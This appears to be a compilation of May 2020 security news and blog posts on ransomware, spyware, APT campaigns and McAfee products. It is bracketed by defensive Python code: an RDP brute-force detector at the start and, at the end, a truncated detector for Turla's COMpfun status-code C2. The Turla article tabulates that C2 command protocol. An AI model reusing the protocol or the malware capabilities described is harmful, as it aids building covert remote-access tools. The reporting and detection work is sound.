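        if not line or line.startswith("#"):
            continue
        ts, event_id, logon_type, src_ip, user = line.split(",")
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "event_id": int(event_id),
            "logon_type": int(logon_type),
            "src_ip": src_ip,
            "user": user,
        })
    return events


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=2),
                          logon_types=(RDP_LOGON_TYPE,)):
    """Flag source IPs with >= threshold failed logons inside a sliding window.

    Returns {src_ip: {"failures": total failed logons from that IP,
                      "success_after_burst": user name of the first successful
                                             logon after the burst, or None}}.
    A success from a flagged IP is the high-priority finding: the guessing
    may have worked, so that account needs a reset and its sessions a review.
    """
    recent = defaultdict(deque)   # src_ip -> failure timestamps still inside the window
    totals = defaultdict(int)     # src_ip -> failures seen overall
    findings = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["logon_type"] not in logon_types:
            continue
        ip = ev["src_ip"]
        if ev["event_id"] == FAILED_LOGON:
            totals[ip] += 1
            q = recent[ip]
            q.append(ev["ts"])
            while q and ev["ts"] - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold or ip in findings:
                entry = findings.setdefault(ip, {"failures": 0, "success_after_burst": None})
                entry["failures"] = totals[ip]
        elif ev["event_id"] == SUCCESS_LOGON and ip in findings:
            if findings[ip]["success_after_burst"] is None:
                findings[ip]["success_after_burst"] = ev["user"]
    return findings


if __name__ == "__main__":
    for ip, info in detect_rdp_bruteforce(parse_events(SAMPLE_LOG)).items():
        print(f"{ip}: {info['failures']} failed RDP logons, "
              f"success afterwards: {info['success_after_burst']}")
```

One practical caveat: when Network Level Authentication is enabled, failed RDP attempts are often recorded with logon type 3 rather than 10, so a production rule usually passes `logon_types=(3, 10)` and relies on the source address, or on the listening port, to tell RDP guessing apart from SMB or other network logons.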

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the current health emergency, it’s best to proceed with caution and avoid interacting with the message altogether.   

Go directly to the source

If you receive information from an unknown user, go directly to the source instead of clicking on links within messages or attachments. Using a tool like McAfee WebAdvisor can help users stay safe from malware and other threats while searching the web.   

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post How to Stay Protected From Malware While Online at Home appeared first on McAfee Blogs.

Texas Department of Transportation (TxDOT) hit by a ransomware attack

A new ransomware attack hit the Texas government; this time the malware infected systems at the state’s Department of Transportation (TxDOT).

The Texas government suffered two ransomware attacks in a few weeks; the first one took place on May 8, 2020 and infected systems at the Texas court.

Now ransomware has infected the systems at the state’s Department of Transportation (TxDOT); the attack forced the administrators to shut down the systems to prevent the ransomware from spreading.

The state’s Department of Transportation (TxDOT) discovered the second attack on May 14; the infection followed unauthorized access to the Department’s network.

“The Texas Department of Transportation determined that on May 14, 2020, there was unauthorized access to the agency’s network in a ransomware event” states the TxDOT.

The agency immediately took steps to prevent further damage and isolated the impacted systems; it is “working to ensure critical operations continue during this interruption.”

The agency reported the incident to local authorities and is investigating it with the help of the FBI.

At the time of writing it is not clear whether the two attacks are connected; no technical details about either incident have been released, nor is it known whether the attackers stole any data.

In August 2019, Texas was hit by a wave of ransomware attacks that targeted local governments.

At least 23 local government organizations were impacted by the ransomware attacks; the Department of Information Resources (DIR) is currently investigating them and providing support to mitigate the attacks.

Pierluigi Paganini

(SecurityAffairs – TxDOT, hacking)

The post Texas Department of Transportation (TxDOT) hit by a ransomware attack appeared first on Security Affairs.

Good Malware Protection Doesn’t Need to Slow You Down!

Good malware protection doesn’t need to slow you down!

“Security software slows down my PC.” This is a comment that is often heard when talking about malware protection on computers and laptops. While this may be true for many security products, even including the security software that is built into the Windows operating system, this is not the case with McAfee security. As a matter of fact, independent tests since 2016 have proven that McAfee is not only good at catching malware, it’s also one of the lightest security products available today.

What is malware protection?

Security software continuously keeps an eye on all the data that comes in and goes out of your PC. It does this in order to verify that there are no security threats to your personal data, privacy and identity while you are, for example, shopping online, checking your social media or working remotely.

Because security software is always active and protecting in the background, many users have the idea that malware protection necessarily slows down the performance of their PCs. This idea, however, is likely based on experiences from long ago, as certain security products did indeed have serious impacts on the user experience.

Measuring PC Performance

To measure how much impact malware protection nowadays has on PC performance, some independent test labs include performance impact benchmarks in their security product tests. The most well-known of these test labs are AV-TEST, which is based in Germany, and Austria based AV-Comparatives. These independent labs are among the most reputable and well-known anti-malware test labs in the world.

In their tests both labs look at ~20 security brands, including McAfee, and the test results show that McAfee Total Protection is one of the lightest security products available today.

Let’s have a closer look at what AV-TEST and AV-Comparatives have to say.


Every two months AV-TEST publishes the results of its on-going tests of 20 security products. As part of these tests the lab continuously evaluates the latest versions of all products using their default settings and measures the average impact of the product on computer speed in daily use.

A security product can achieve a maximum of 6 points depending on the test results. McAfee has consistently received the highest score in all performance tests since May 2018:

AV-Test PC Performance

Because of these excellent test results McAfee Total Protection was awarded the ‘2019 Performance Award’ by AV-TEST in March 2020.

Best Performance 2019 AV-TEST Award

Below is what AV-TEST states about the award and about McAfee Total Protection:

Only products that make a high-performance finish in the AV-TEST labs throughout the test period of an entire year can claim this proof of absolute peak performance. With the AV-TEST Awards, a security product proves not only its technical superiority. Above all, it proves that it is documented as being the best the market currently has to offer in the fight against cyber-attacks.

With ‘Total Protection’, McAfee succeeded at fielding a top product in 2019 which was able to meet the high standards of the AV-TEST Institute. In the consumer field, McAfee receives recognition for best performance and is thus given the Best Performance 2019 Award by the AV-TEST Institute. 

With ‘Total Protection’, McAfee proves that good malware defense does not have to sacrifice system performance, says Andreas Marx, CEO of AV-TEST. Hardly any other software was able to achieve such stellar results in the category of performance in the annual test. Which is why McAfee receives the Performance Award for consumer software.

The announcement of the award can be seen on the AV-TEST website here.


Every year in April and October AV-Comparatives publishes their Performance Test Report. For this report the lab looks at 17 security products including McAfee Total Protection and evaluates how much impact these have on PC performance.

The test lab uses low-end computers as these are most widely used and more at risk of suffering from resource consumption and thus performance impact. The tests also mimic daily usage as much as possible and focus on activities such as copying files, installing and uninstalling applications, launching applications, downloading files and browsing websites.

Based on the results on these tests the products are then evaluated and graded in award levels ranging from ADVANCED+ (the highest ranking) to STANDARD (the lowest ranking).

McAfee has achieved the ADVANCED+ ranking continuously since October 2016:

AV-Comparatives Performance Impact Scores

As a result, McAfee received the Silver Award in the category ‘Overall Performance (Low System-Impact)’ in February 2020 for demonstrating a lower impact on system performance than other products throughout 2019.

And in 2020 we are off to a good start again!

On May 8th AV-Comparatives published April 2020 Performance Test Report and McAfee Total Protection is again awarded with the highest possible rating: ADVANCED+.

With this result McAfee continues to show less impact on PC Performance than most other security products and is one of the lightest security products on the market: 


McAfee continues to show less impact on PC Performance than most other security products.

Summary

Even though good malware protection is continuously monitoring all activity on your PC and laptop for cyber threats, this doesn’t have to mean that it also slows down the performance of your devices.

As we have seen in the test results of two of the world’s most reputable anti-malware test labs AV-TEST and AV-Comparatives, McAfee Total Protection has been achieving stellar test results in performance tests since October 2016 which also resulted in McAfee being awarded by both test labs with performance awards in 2019.

And with an excellent start in the 2020 test reports we believe that it is fair to say that good malware protection doesn’t need to slow you down and McAfee Total Protection is one of the lightest security products currently available.



The post Good Malware Protection Doesn’t Need to Slow You Down! appeared first on McAfee Blogs.

Mandrake, a highly sophisticated Android spyware used in targeted attacks

Security experts discovered a highly sophisticated Android spyware platform, dubbed Mandrake, that remained undetected for four years.

Researchers from Bitdefender discovered a highly sophisticated Android spyware platform dubbed Mandrake; it was involved in highly targeted attacks against specific devices. Mandrake is an advanced cyberespionage platform, but experts believe the attacks are financially motivated.

Threat actors behind this campaign managed to fly under the radar for as long as possible. Attackers carefully selected the devices to infect and avoided compromising devices in countries that were not of interest to them.

“Mandrake stood in the shadow for at least 4 years. During this time, it stole data from at least tens of thousands of users.” reads the report published by Bitdefender. “It takes special care not to infect everyone” – This is exactly what the actor did and most likely why it remained under the radar for 4 full years. Because of this strategy, the actual number of infections we were able to trace is quite low; Google Play Apps used as droppers to infect targets have only hundreds or – in some cases – thousands of downloads. It might even be possible that some of the infected users won’t face an attack at all if they present no interest to the actor.”

Most of the infections are in Australia, followed by Europe, America, and Canada. Experts observed two different waves of attacks, the first in 2016 and 2017.

Experts detected seven malicious applications delivering Mandrake in Google Play alone, namely Abfix, CoinCast, SnapTune Vid, Currency XE Converter, Office Scanner, Horoskope, and Car News.


Sinkholing performed by the experts revealed about 1,000 victims during a 3-week period. The researchers estimated that tens of thousands, and probably hundreds of thousands, of users were infected in the last 4 years.

During the past four years, the platform has received numerous updates, operators constantly implemented new features.

Mandrake allows attackers to gain complete control over an infected device and exfiltrate sensitive data; it also implements a kill-switch feature (a special command called seppuku, after the Japanese form of ritual suicide) that wipes all of the victim’s data and leaves no trace of the malware.

“The attacker has access to data such as device preferences, address book and messages, screen recording, device usage and inactivity times, and can obviously paint a pretty accurate picture of the victim, and their whereabouts.” continues the report. “The malware has complete control of the device: it can turn down the volume of the phone and block calls or messages, steal credentials, exfiltrate information, to money transfers and blackmailing. It can conduct phishing attacks, by loading a webpage and injecting a specially crafted JavaScript code to retrieve all data from input forms.”

The list of targets is long and includes an Australian investment trading app, crypto-wallet apps, the Amazon shopping application, Gmail, banking software, payment apps, and an Australian pension fund app.

The malware avoids detection by delaying its activities and working in three stages: dropper, loader, and core.

The dropper is represented by the apps published in Google Play, while it is not possible to determine when the loader and the core are delivered.

The malware implements evasion techniques such as anti-emulation and leverages administrator privileges and the Accessibility Service to achieve persistence.

The report contains technical details about the threat, including Indicators of Compromise.

Pierluigi Paganini

(SecurityAffairs – Mandrake, hacking)

The post Mandrake, a high sophisticated Android spyware used in targeted attacks appeared first on Security Affairs.

Ramsay Malware

A new malware, called Ramsay, can jump air gaps:

ESET said they've been able to track down three different versions of the Ramsay malware, one compiled in September 2019 (Ramsay v1), and two others in early and late March 2020 (Ramsay v2.a and v2.b).

Each version was different and infected victims through different methods, but at its core, the malware's primary role was to scan an infected computer, and gather Word, PDF, and ZIP documents in a hidden storage folder, ready to be exfiltrated at a later date.

Other versions also included a spreader module that appended copies of the Ramsay malware to all PE (portable executable) files found on removable drives and network shares. This is believed to be the mechanism the malware was employing to jump the air gap and reach isolated networks, as users would most likely move the infected executables between the company's different network layers, and eventually end up on an isolated system.

ESET says that during its research, it was not able to positively identify Ramsay's exfiltration module, or determine how the Ramsay operators retrieved data from air-gapped systems.

Honestly, I can't think of any threat actor that wants this kind of feature other than governments:

The researcher has not made a formal attribution as who might be behind Ramsay. However, Sanmillan said that the malware contained a large number of shared artifacts with Retro, a malware strain previously developed by DarkHotel, a hacker group that many believe to operate in the interests of the South Korean government.

Seems likely.


FBI warns US organizations of ProLock ransomware decryptor not working

The FBI issued a flash alert to warn organizations in the United States that the ProLock ransomware decryptor doesn’t work properly.

Early this month, the FBI issued a flash alert to warn organizations of the new threat actor targeting healthcare, government, financial, and retail industries in the US.

“The decryption key or ‘decryptor’ provided by the attackers upon paying the ransom has not routinely executed correctly,” states the alert.

“The decryptor can potentially corrupt files that are larger than 64MB and may result in file integrity loss of approximately 1 byte per 1KB over 100MB.”

Threat actors are attempting to take advantage of the ongoing Coronavirus pandemic and are using COVID-19 lures in their attacks.

Experts reported several ransomware attacks against businesses and organizations; the ProLock ransomware is just another threat added to the list.

The FBI recommends that victims of ransomware attacks avoid paying the ransom to decrypt their files. The Feds warned that the ProLock decryptor does not work correctly and that using it could permanently destroy data: the decryptor can corrupt files larger than 64MB during the decryption process.

The PwndLocker ransomware was first spotted in the threat landscape by security researchers in late 2019; its operators’ demands have ranged from $175,000 to more than $660,000 worth of Bitcoin.

According to the FBI, operators behind the threat gain access to hacked networks via the Qakbot (Qbot) trojan, but experts from Group-IB added that they also target unprotected Remote Desktop Protocol (RDP)-servers with weak credentials. It is still unclear if the ProLock ransomware was managed by the Qakbot gang, or if the ProLock operators pay to gain access to hosts infected with Qakbot to deliver their malware.

“ProLock operators used two main vectors of initial access: QakBot (Qbot) and unprotected Remote Desktop Protocol (RDP)-servers with weak credentials.” reads the report published by Group-IB.

“The latter is a fairly common technique among ransomware operators. This kind of access is usually bought from a third party but may be obtained by group members as well.”

In March, threat actors behind PwndLocker changed the name of their malware to ProLock, immediately after security firm Emsisoft released a free decryptor tool.

According to the popular investigator Brian Krebs, the systems at Diebold Nixdorf were recently infected by the ProLock ransomware (aka PwndLocker), the same piece of ransomware involved in the attack against Lasalle County, Ill. in March.

“Fabian Wosar, Emsisoft’s chief technology officer, said if Diebold’s claims about not paying their assailants are true, it’s probably for the best: That’s because current versions of ProLock’s decryptor tool will corrupt larger files such as database files.” reads the analysis published by Krebs.

“As luck would have it, Emsisoft does offer a tool that fixes the decryptor so that it properly recovers files held hostage by ProLock, but it only works for victims who have already paid a ransom to the crooks behind ProLock.

“We do have a tool that fixes a bug in the decryptor, but it doesn’t work unless you have the decryption keys from the ransomware authors,” Wosar said.”

Pierluigi Paganini

(SecurityAffairs – ProLock, hacking)

The post FBI warns US organizations of ProLock ransomware decryptor not working appeared first on Security Affairs.

Experts reported the hack of several supercomputers across Europe

Organizations managing supercomputers across Europe reported their systems have been compromised to deploy cryptocurrency miners.

Crooks have compromised supercomputers across Europe to deploy cryptocurrency miners; incidents have already been reported in the UK, Germany, and Switzerland. Rumors are circulating about a similar infection of a supercomputer located in Spain.

The supercomputers have been shut down to investigate the security breaches.

On Monday, the German bwHPC organization announced that five of its supercomputers had to be shut down due to a cryptominer infection.

Below the message published by the organization:

“Dear users, due to an IT security incident the state-wide HPC systems

  • bwUniCluster 2.0,
  • ForHLR II,
  • bwForCluster JUSTUS,
  • bwForCluster BinAC, and
  • Hawk”

Another system that was reportedly infected early last week is the ARCHER supercomputer at the University of Edinburgh.

“Due to a security exploitation on the ARCHER login nodes, the decision has been taken to disable access to ARCHER while further investigations take place.” reads the status page for the system.

“As you may be aware, the ARCHER incident is part of a much broader issue involving many other sites in the UK and internationally. We are continuing to work with the National Cyber Security Centre (NCSC) and Cray/HPE and further diagnostic scans are taking place on the system.”

The organization reset SSH passwords in response to the incident.

On Wednesday another supercomputer was compromised; the system was located in Barcelona, Spain, and the infection was reported by security researcher Felix von Leitner.

“More incidents surfaced the next day, on Thursday. The first one came from the Leibniz Computing Center (LRZ), an institute under the Bavarian Academy of Sciences, which said it had disconnected a computing cluster from the internet following a security breach.” reported ZDNet.

“The LRZ announcement was followed later in the day by another from the Julich Research Center in the town of Julich, Germany. Officials said they had to shut down the JURECA, JUDAC, and JUWELS supercomputers following an “IT security incident.”

Other similar incidents made the headlines: on Saturday a high-performance computing cluster at the Faculty of Physics at the Ludwig-Maximilians University in Munich, Germany was infected with malware.

The Swiss Center of Scientific Computations (CSCS) in Zurich, Switzerland also reported a cyber incident and it shut down any external access to its infrastructure in response to the security breach.

“CSCS detected malicious activity in relation to these attacks. Due to this situation, the external access to the centre has been closed until having restored a safe environment. The users were informed immediately and are kept up to date. Not affected are the weather forecasts of MeteoSwiss, which are also calculated at CSCS.” reads the security advisory.

“We are currently investigating the illegal access to the centre. Our engineers are actively working on bringing back the systems as soon as possible to reduce the impact on our users to a minimum,” says CSCS-Director Thomas Schulthess.

Today, the Computer Security Incident Response Team (CSIRT) for the European Grid Infrastructure released technical details of the malware involved in these incidents.

Researchers from security firm Cado Security also released Indicators of Compromise (IoCs).

ZDNet, citing the opinion of a security researcher, speculates that threat actors have exploited the CVE-2019-15666 vulnerability to gain root access to the supercomputers then deploy a Monero (XMR) cryptocurrency miner.

Other experts speculate that the supercomputers were hacked by nation-state actors because they were involved in the research on the COVID-19 outbreak.

Pierluigi Paganini

(SecurityAffairs – supercomputers, hacking)

The post Experts reported the hack of several supercomputers across Europe appeared first on Security Affairs.

Coronavirus-themed attacks May 10 – May 16, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 10 to May 16, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide; experts are observing new campaigns on a daily basis.

Below a list of attacks detected this week.

May 12 – Zeus Sphinx continues to be used in COVID-19-themed attacks

The Zeus Sphinx banking Trojan continues to evolve, receiving new updates while it is employed in ongoing coronavirus-themed scams.

May 13 – Crooks continues to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

May 14 – China-linked hackers are attempting to steal COVID-19 Vaccine Research

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal COVID-19 vaccine research.

May 16 – Microsoft is open-sourcing COVID-19 threat intelligence

Microsoft has recently announced that it has made some of its COVID-19 threat intelligence open-source. 

May 16 – QNodeService Trojan spreads via fake COVID-19 tax relief

Experts spotted a new malware dubbed QNodeService that was involved in a COVID-19-themed phishing campaign in which crooks promise victims COVID-19 tax relief.

If you are interested in COVID-19-themed attacks since February 1, take a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Coronavirus-themed attacks May 10 – May 16, 2020 appeared first on Security Affairs.

Security Affairs newsletter Round 264

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

Blue Mockingbird Monero-Mining campaign targets web apps
Shiny Hunters group is selling data from 11 companies on the Dark Web
Swiss rail vehicle manufacturer Stadler hit by a malware-based attack
ATM vendor Diebold Nixdorf suffered a Ransomware attack
Experts disclose security flaws in Oracle’s iPlanet Web Server
GDPR Data Security Checklist in the Age of COVID-19 and the Remote Workforce
Sodinokibi ransomware uses MS API to encrypt open and locked files
STAMINA, a new approach to malware detection by Microsoft, Intel
VMware is going to fix recent Salt issues in vROps
A cyber attack hit a port on Strait of Hormuz, Iran said
Adobe addresses critical issues in Acrobat, Reader, and DNG SDK
Patch now your vBulletin install before hacker will target your forum
Popular Page Builder WordPress plugin fixes critical issues. Update it now!
Trojan Lampion is back after 3 months
Zeus Sphinx continues to be used in Coronavirus-themed attacks
Chancellor Merkel has ‘hard evidence’ of Russian hackers targeted her
Crooks continues to use COVID-19 lures, Microsoft warns
Expert found 1,236 websites infected with Magecart e-skimmer
Healthcare giant Magellan Health discloses data breach after ransomware attack
Microsoft May 2020 Patch Tuesday fixes 111 flaws, 13 Critical
USCYBERCOM shares five new North Korea-linked malware samples
China-linked hackers are attempting to steal COVID-19 Vaccine Research
Crooks stole $10 million from Norway’s state investment fund Norfund
Google WordPress Site Kit plugin grants attacker Search Console Access
New Ramsay malware allows exfiltrating files from air-gapped computers
Zerodium will no longer acquire certain types of iOS exploits due to surplus
Chinese APT Tropic Trooper target air-gapped military Networks in Asia
Interserve UK defense contractor hacked, up to 100,000 past and present employees details exposed
Palo Alto Networks addresses tens of serious issues in PAN-OS
Russian APT Turla’s COMpfun malware uses HTTP status codes to receive commands
Threat actors are offering for sale 550 million stolen user records
APT group targets high profile networks in Central Asia
Microsoft is open-sourcing COVID-19 threat intelligence
QNodeService Trojan spreads via fake COVID-19 tax relief

Pierluigi Paganini

(SecurityAffairs – newsletter, hacking)

The post Security Affairs newsletter Round 264 appeared first on Security Affairs.

APT group targets high profile networks in Central Asia

Security firms have foiled an advanced cyber espionage campaign carried out by a Chinese APT and aimed at infiltrating a governmental institution and two companies.

Antivirus firms have uncovered and foiled an advanced cyber espionage campaign aimed at a governmental institution and two companies in the telecommunications and gas sector.

The level of sophistication of the attack and the nature of the targets suggest the involvement of an advanced persistent threat, likely from China, focused on cyber espionage activity in Central Asia.

Attackers used multiple commodity malware families and previously unknown backdoors in the attacks; the analysis of their code suggests a possible link with multiple campaigns uncovered over several years.

Most of the C2 servers used by the attackers are hosted by the provider Choopa, LLC, and the threat actors made large use of Gh0st RAT, a malware attributed to China-linked cyber espionage groups.

The security firms ESET and Avast first detected the attacks in September and January, respectively. The researchers identified a host used as a repository containing hacking tools and backdoors, whose code has many similarities with malware previously associated with China-linked APT groups.

“The samples we analyzed contain links to malware samples and campaigns, such as Microcin, BYEBY, and Vicious Panda, previously described by Kaspersky, Palo Alto Networks, and Check Point, respectively. The backdoors we found are custom tools that have not previously been analyzed, as far as we know.” reads a report published by Avast. “The majority of the C&C servers are registered to Choopa, LLC, a hosting platform that has been used by cybercriminals in the past.”

Below a timeline of the attacks that appeared to be associated with the same threat actor.

Avast APT Timeline_May-2020

“An APT group, which we believe could possibly be from China, planted backdoors to gain long-term access to corporate networks. Based on our analysis, we suspect the group was also behind attacks active in Mongolia, Russia, and Belarus.” continues Avast.

Researchers from ESET who investigated the attacks discovered three backdoors, collectively tracked as Mikroceen. The backdoors allowed the threat actors to manage the target file system, establish a remote shell, take screenshots, manage services and processes, and run console commands.

Below the list of backdoors published by ESET:

  • sqllauncher.dll (VMProtected backdoor)
  • logon.dll (VMProtected backdoor)
  • logsupport.dll (VMProtected backdoor)

Experts noticed that all three backdoors feature protection against reverse engineering. Two of them, “sqllauncher.dll” and “logon.dll,” run as services and use the same C2 infrastructure.

Attackers use a version of the Mimikatz post-exploitation tool and rely on Windows Management Instrumentation (WMI) for lateral movement.

“Avast reported its findings to the local CERT team and reached out to the telecommunications company. We have not heard back from either organization.” concluded Avast.

“Avast has recently protected users in Central Asia from further attacks using the samples we analyzed.”

Both Avast and ESET have published a list of indicators of compromise (IoC) for the above threats.

Pierluigi Paganini

(SecurityAffairs – Microcin malware, hacking)

The post APT group targets high profile networks in Central Asia appeared first on Security Affairs.

Microsoft is open-sourcing COVID-19 threat intelligence

Microsoft has recently announced that it has made some of its COVID-19 threat intelligence open-source. 

As the number of Coronavirus-themed attacks continues to increase, Microsoft announced it is open-sourcing its COVID-19 threat intelligence to help organizations repel these threats.

“Microsoft processes trillions of signals each day across identities, endpoint, cloud, applications, and email, which provides visibility into a broad range of COVID-19-themed attacks, allowing us to detect, protect, and respond to them across our entire security stack.” reads a post published by Microsoft. “Today, we take our COVID-19 threat intelligence sharing a step further by making some of our own indicators available publicly for those that are not already protected by our solutions.”

Sharing information could offer the community a more complete view of attackers’ tactics, techniques, and procedures.

Microsoft experts have already been sharing examples of malicious lures and have provided guided hunting of COVID-themed attacks through Azure Sentinel Notebooks.

COVID malspam

Microsoft is going to publicly release some of its threat indicators; the company pointed out that its users are already protected against these attacks by Microsoft Threat Protection (MTP).

Microsoft has made available the indicators both in the Azure Sentinel GitHub repo, and through the Microsoft Graph Security API.

“These indicators are now available in two ways. They are available in the Azure Sentinel GitHub and through the Microsoft Graph Security API. For enterprise customers who use MISP for storing and sharing threat intelligence, these indicators can easily be consumed via a MISP feed.” continues Microsoft.

“This threat intelligence is provided for use by the wider security community, as well as customers who would like to perform additional hunting, as we all defend against malicious actors seeking to exploit the COVID crisis.”

This is just the beginning of the threat intelligence sharing of Coronavirus-related IOCs that will be offered through the peak of the outbreak.

Microsoft is releasing file hash indicators related to malicious email attachments employed in the campaigns. 

Azure Sentinel customers can import the indicators using a Playbook or access them directly from queries. Microsoft added that both Office 365 ATP and Microsoft Defender ATP already block the attacks associated with the above indicators.

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post Microsoft is open-sourcing COVID-19 threat intelligence appeared first on Security Affairs.

QNodeService Trojan spreads via fake COVID-19 tax relief

Experts spotted a new malware dubbed QNodeService that was involved in a Coronavirus-themed phishing campaign in which crooks promise victims COVID-19 tax relief.

Researchers uncovered a new malware dubbed QNodeService that was employed in a Coronavirus-themed phishing campaign. The operators behind the campaign use a COVID-19 lure promising victims tax relief.

The phishing messages deliver a Trojan sample associated with a file named “Company PLP_Tax relief due to Covid-19 outbreak CI+PL.jar”; experts from MalwareHunterTeam noticed that the malicious code was detected only by ESET AV.

The QNodeService Trojan is written in Node.js and is delivered through a Java downloader embedded in the .jar file, Trend Micro warns. 

“Running this file led to the download of a new, undetected malware sample written in Node.js; this trojan is dubbed as “QNodeService”.” reads the analysis published by Trend Micro.

“The use of Node.js is an unusual choice for malware authors writing commodity malware, as it is primarily designed for web server development, and would not be pre-installed on machines likely to be targeted. However, the use of an uncommon platform may have helped evade detection by antivirus software.”

QNodeService is able to perform a broad range of activities, such as download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management. The malware can also steal system information including IP address and location, download additional malware payloads, and exfiltrate stolen data. The actual malware only targets Windows systems, but experts believe that developers are working to make it a cross-platform threat.

The Java downloader embedded in the bait document is obfuscated with Allatori; it downloads the Node.js malware file (either “qnodejs-win32-ia32.js” or “qnodejs-win32-x64.js”) and a file called “wizard.js.”

Either a 32-bit or 64-bit version of Node.js is dropped depending on the Windows system architecture of the target machine. 

The wizard.js file is an obfuscated JavaScript (Node.js) file used to achieve persistence by creating a “Run” registry key entry and to download another malicious payload.

One of the most interesting features implemented by the QNodeService malware is the support for an “http-forward” command, which allows attackers to download files without directly connecting to a victim’s PC.

“Of particular note is the http-forward command, which allows an attacker to download a file without directly connecting to the victim machine, as shown below in figures 13-16.” continues Trend Micro. “However, a valid request path and access token are required to access files on the machine. The C&C server must first send “file-manager/forward-access” to generate the URL and access token to use for the http-forward command later.”

Trend Micro researchers included Indicators of Compromise (IoCs) in their report.

Unfortunately, Coronavirus-themed attacks continue to target individuals, businesses, and organizations worldwide.

At the end of March, experts from IBM X-Force uncovered a hacking campaign employing the Zeus Sphinx malware that focused on government relief payment.

Operators were spreading it in a spam campaign aimed at stealing victims’ financial information; the spam messages sent to the victims claim to provide information related to the Coronavirus outbreak and government relief payments.

Researchers revealed that the malware is receiving constant upgrades to improve its capabilities. 

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post QNodeService Trojan spreads via fake COVID-19 tax relief appeared first on Security Affairs.

Threat Roundup for May 8 to May 15

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between May 8 and May 15. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, or

Read More

20200515-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for May 8 to May 15 appeared first on Cisco Blogs.

Russian APT Turla’s COMpfun malware uses HTTP status codes to receive commands

Russia-linked cyberespionage group Turla targets diplomatic entities in Europe with a new piece of malware tracked as COMpfun.

Security experts from Kaspersky Lab have uncovered a new cyberespionage campaign carried out by Russia-linked APT Turla that employs a new version of the COMpfun malware. The new malware allows attackers to control infected hosts using a technique that relies on HTTP status codes.

COMpfun was first spotted in the wild in 2014 by G DATA researchers; Kaspersky first observed the threat in autumn 2019, when it was employed in attacks against diplomatic entities across Europe.

“You may remember that in autumn 2019 we published a story about how a COMpfun successor known as Reductor infected files on the fly to compromise TLS traffic.” reads the analysis published by Kaspersky. “The campaign operators retained their focus on diplomatic entities, this time in Europe, and spread the initial dropper as a spoofed visa application.”

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

In March the APT group employed two new pieces of malware in watering hole attacks targeting several high-profile Armenian websites.

The COMpfun malware analyzed by Kaspersky implements a new technique to receive commands from the C2 as HTTP status codes.

COMpfun is a remote access trojan (RAT) that can collect system data, log keystrokes, and take screenshots.

Turla compfun

The new variant of the COMpfun malware includes two new features: the ability to monitor when USB removable devices are plugged into or unplugged from the host, and the C2 communication technique mentioned above.

The first feature was implemented to allow the malware to propagate itself to the connected device.

The second feature was implemented to avoid detection: Turla vxers implemented a new C2 protocol that relies on HTTP status codes.

HTTP status codes report the state of the server and instruct the client on what to do next (e.g., drop the connection); COMpfun abuses this mechanism to control the bot running on the compromised system.

“We observed an interesting C2 communication protocol utilizing rare HTTP/HTTPS status codes (check IETF RFC 7231, 6585, 4918). Several HTTP status codes (422-429) from the Client Error class let the Trojan know what the operators want to do. After the control server sends the status “Payment Required” (402), all these previously received commands are executed.” continues the analysis.

For example, if the COMpfun server responds with a 402 status code followed by a 200 status code, the malware sends the collected target data to the C2 along with the current tickcount.

Below the list of commands associated with common HTTP status codes:

HTTP status | RFC status meaning | Corresponding command functionality
200 | OK | Send collected target data to C2 with current tickcount
402 | Payment Required | This status is the signal to process received (and stored in binary flag) HTTP statuses as commands
422 | Unprocessable Entity (WebDAV) | Uninstall. Delete COM-hijacking persistence and corresponding files on disk
423 | Locked (WebDAV) | Install. Create COM-hijacking persistence and drop corresponding files to disk
424 | Failed Dependency (WebDAV) | Fingerprint target. Send host, network and geolocation data
427 | Undefined HTTP status | Get new command into IEA94E3.tmp file in %TEMP%, decrypt and execute appended command
428 | Precondition Required | Propagate self to USB devices on target
429 | Too Many Requests | Enumerate network resources on target
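A defender-side detection sketch for the status-code protocol just described, added here as an example (it is neither Kaspersky's analysis code nor the malware's own): it replays constructed proxy-log lines in an assumed "<time> <client> <server> <status>" format and alerts only when a 402 follows one or more queued 422-429 statuses from the same server, so a lone 429 rate limit from a legitimate API does not fire.

```python
"""
Detection sketch for the COMpfun HTTP status-code C2 pattern.

Added example, not Kaspersky's code and not the malware's code. It scans
constructed proxy-log lines in an assumed "<time> <client_ip> <server_host>
<http_status>" format and raises an alert when a client receives one or more
of the rare 422-429 Client Error statuses from a server and that server
later answers 402 "Payment Required", which the report describes as the
signal to execute the queued commands.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

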